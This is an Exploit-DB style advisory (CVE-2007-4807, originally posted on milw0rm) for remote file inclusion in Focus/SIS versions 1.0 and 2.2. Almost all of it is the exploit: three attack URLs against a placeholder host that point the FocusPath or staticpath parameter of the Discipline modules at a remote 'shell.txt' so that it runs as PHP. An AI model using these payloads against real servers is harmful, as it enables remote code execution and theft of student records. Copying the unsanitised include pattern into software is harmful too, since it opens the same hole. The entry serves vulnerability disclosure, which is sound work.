Focus/SIS <= 1.0/2.2 Remote File Inclusion Vulnerabilities

EDB-ID: 4377	CVE: 2007-4807	OSVDB-ID: 36998
Author: ThE TiGeR	Published: 2007-09-08	Verified:
Exploit Code:	Vulnerable App: N/A

#Focus/SIS =>1.0&2.2 Remote file inclusion
#Download v1.0 : http://unix.freshmeat.net/redir/focus_sis/64492/url_zip/Focus_v1.0.zip
#         v2.2 : http://www.focus-sis.org/download.php?modfunc=file&version=2.2
============================================================================================================
#Exploit V1.0 :
#http://victime.com/Focus_v1.0_path/modules/Discipline/CategoryBreakdownTime.php?FocusPath= shell.txt?
============================================================================================================
#Exploit v 2.2 :
#http://victime.com/Focus_v2.2_path/modules/Discipline/CategoryBreakdownTime.php?staticpath= shell.txt?
#http://victime.com/Focus_v2.2_path/modules/Discipline/StudentFieldBreakdown.php?staticpath=shell.txt?
#Greetz & Thx : Str0ke
#Discovered by ThE TiGeR
# milw0rm.com [2007-09-08]

Comments

Focus/SIS <= 1.0/2.2 Remote File Inclusion Vulnerabilities

Rating

No comments so far